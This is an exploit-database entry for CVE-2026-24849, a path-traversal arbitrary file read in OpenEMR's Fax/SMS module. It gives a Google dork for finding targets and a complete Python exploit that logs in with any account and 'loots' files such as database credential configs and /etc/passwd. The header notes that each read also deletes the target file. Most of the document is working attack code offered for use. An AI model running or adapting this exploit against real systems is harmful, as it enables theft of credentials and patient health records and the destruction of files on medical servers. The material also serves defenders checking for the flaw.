## https://sploitus.com/exploit?id=EDB-ID:52610
# Exploit Title: OpenEMR 7.0.2 - Arbitrary File Read
# Google Dork: intitle:"OpenEMR" inurl:"interface/login/login.php"
# Date: 2026-06-06
# Exploit Author: doany1
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://sourceforge.net/projects/openemr/files/OpenEMR%20Current/7.0.2/openemr-7.0.2.tar.gz/download
# Version: OpenEMR < 7.0.4 (tested on 7.0.2)
# Tested on: Ubuntu 22.04 / PHP 8.1 / Apache 2.4 (OpenEMR 7.0.2)
# CVE : CVE-2026-24849
# CWE : CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
#
# Description:
# The Fax/SMS module's EtherFaxActions::disposeDoc() method
# (interface/modules/custom_modules/oe-module-faxsms) reads a caller-supplied
# `file_path` request parameter and passes it straight to readfile() with no
# path validation. The method never calls authenticate(), so the only thing
# required to reach it is a valid OpenEMR session.
#
# Privilege required:
# ANY authenticated user -- this is NOT an admin-only bug. A low-privilege
# account (receptionist, clinician, etc.) can read any file the web-server
# user can reach: sites/default/sqlconf.php (DB credentials), /etc/passwd,
# application source, and so on. The admin/pass values in the examples below
# are only convenient demo credentials, not a requirement of the bug.
#
# Prerequisites:
# - Any valid OpenEMR login (no privileges required).
# - The Fax/SMS module enabled with EtherFax selected as the fax provider
# (the file read does NOT require a real EtherFax account).
#
# WARNING (destructive):
# disposeDoc() calls unlink() on the target *after* reading it. Reading a file
# that the web-server user is allowed to delete WILL remove it. Prefer
# root-owned targets (e.g. /etc/passwd) whose parent directory the web user
# cannot write, so the unlink() fails and the file survives.
#
# References:
# https://github.com/openemr/openemr/security/advisories/GHSA-w6vc-hx2x-48pc
# https://nvd.nist.gov/vuln/detail/CVE-2026-24849
#
# Usage:
# Interactive (prompts for everything):
# python3 exploit-CVE-2026-24849.py
# Non-interactive:
# python3 exploit-CVE-2026-24849.py -t http://10.10.10.10 -u admin -P pass \
# -f /var/www/html/openemr/sites/default/sqlconf.php
import argparse
import getpass
import re
import sys
try:
import requests
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except ImportError:
sys.exit("[-] This exploit needs the 'requests' module: pip3 install requests")
UA = "Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0"
FAXSMS = "/interface/modules/custom_modules/oe-module-faxsms/index.php"
# Method name varies across affected minor versions (disposeDoc <-> disposeDocument).
ACTIONS = ["disposeDoc", "disposeDocument"]
# An unauthenticated request is answered with a JS redirect to this path.
# (Use a narrow marker: every OpenEMR page embeds generic timeout JS.)
FAIL_MARKER = "login_screen.php?error=1"
def ask(prompt, default=None, secret=False):
label = "%s [%s]: " % (prompt, default) if default else "%s: " % prompt
value = getpass.getpass(label) if secret else input(label).strip()
return value or default
def login(sess, base, site, user, password):
"""Establish an OpenEMR session in `sess`. Validity is confirmed later by an
actual file read, so this just performs the GET (CSRF prime) + POST."""
# 1) prime a session cookie and grab the CSRF token if the form exposes one
r = sess.get(base + "/interface/login/login.php",
params={"site": site}, timeout=20, verify=False)
m = re.search(r"csrf_token_form.*?value=([\"'])(.*?)\1", r.text, re.S)
data = {
"new_login_session_management": "1",
"authProvider": "Default",
"authUser": user,
"clearPass": password,
"languageChoice": "1",
}
if m: # OpenEMR doesn't enforce it on this POST, but send it when present
data["csrf_token_form"] = m.group(2)
# 2) authenticate
sess.post(base + "/interface/main/main_screen.php",
params={"auth": "login", "site": site},
data=data, timeout=20, verify=False)
def read_file(sess, base, site, remote_path):
"""Return (content, status). status in {ok, session, missing}."""
for action in ACTIONS:
r = sess.get(base + FAXSMS,
params={"site": site, "type": "fax",
"_ACTION_COMMAND": action,
"file_path": remote_path, "action": "download"},
timeout=20, verify=False)
body = r.text
if FAIL_MARKER in body:
return None, "session"
if "Problem with download" in body:
return None, "missing" # method ran, file absent/unreadable
if body.strip() == "":
continue # likely wrong method name -> try next
return body, "ok"
return None, "missing"
def main():
ap = argparse.ArgumentParser(
description="OpenEMR < 7.0.4 authenticated arbitrary file read (CVE-2026-24849)")
ap.add_argument("-t", "--target", help="Base URL, e.g. http://10.10.10.10")
ap.add_argument("-u", "--user", help="OpenEMR username (default: admin)")
ap.add_argument("-P", "--password", help="OpenEMR password")
ap.add_argument("-s", "--site", help="OpenEMR site (default: default)")
ap.add_argument("-f", "--file", help="Absolute path of the remote file to read")
ap.add_argument("-o", "--output", help="Save looted file here instead of printing")
args = ap.parse_args()
print("[*] OpenEMR < 7.0.4 - Authenticated Arbitrary File Read (CVE-2026-24849)\n")
target = args.target or ask("Target base URL (e.g. http://10.10.10.10)")
if not target:
sys.exit("[-] Target is required.")
target = target.rstrip("/")
if not target.startswith("http"):
target = "http://" + target
user = args.user or ask("Username", default="admin")
password = args.password if args.password is not None else ask("Password", secret=True)
site = args.site or ask("Site", default="default")
sess = requests.Session()
sess.headers.update({"User-Agent": UA})
try:
print("[*] Authenticating to %s as '%s' ..." % (target, user))
login(sess, target, site, user, password)
# Confirm auth + that the vulnerable module is reachable by reading a
# safe, root-owned probe file (its unlink() fails, so it is not deleted).
_, status = read_file(sess, target, site, "/etc/hostname")
except requests.RequestException as e:
sys.exit("[-] Connection error: %s" % e)
if status == "session":
sys.exit("[-] Login failed - check credentials / site.")
if status == "missing":
print("[!] Logged in, but the file-read returned nothing.")
print(" Confirm the Fax/SMS module is enabled with EtherFax as the provider.\n")
else:
print("[+] Authenticated; CVE-2026-24849 file-read confirmed.\n")
def loot(path):
try:
data, status = read_file(sess, target, site, path)
except requests.RequestException as e:
print("[-] Connection error: %s" % e)
return "error"
if status == "session":
print("[-] Session rejected (auth/ACL problem).")
elif status == "missing":
print("[-] '%s' not found/readable, or Fax/SMS+EtherFax is not enabled." % path)
else:
if args.output:
with open(args.output, "w") as fh:
fh.write(data)
print("[+] %d bytes of '%s' written to %s" % (len(data), path, args.output))
else:
print("[+] ---------- %s ----------" % path)
sys.stdout.write(data if data.endswith("\n") else data + "\n")
print("[+] --------------------------")
return status
# single-shot mode
if args.file:
status = loot(args.file)
sys.exit(0 if status == "ok" else 2)
# interactive mode: read files until the operator quits
print("[*] Interactive read - enter absolute file paths (blank or 'q' to quit).")
print(" Reminder: disposeDoc() unlink()s the target after reading - prefer root-owned files.\n")
while True:
path = ask("file_path(Which file would you like to see e.g /etc/passwd)")
if not path or path.lower() in ("q", "quit", "exit"):
break
loot(path)
print()
if __name__ == "__main__":
main()